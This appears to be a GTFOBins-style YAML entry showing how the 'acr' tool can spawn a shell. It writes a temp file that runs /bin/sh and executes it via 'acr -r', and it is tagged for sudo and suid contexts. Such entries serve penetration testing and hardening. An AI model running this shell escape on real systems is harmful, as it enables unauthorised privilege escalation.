Files

14 lines
257 B
Plaintext

---
functions:
command:
- code: |-
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
contexts:
sudo:
suid:
shell: true
unprivileged:
...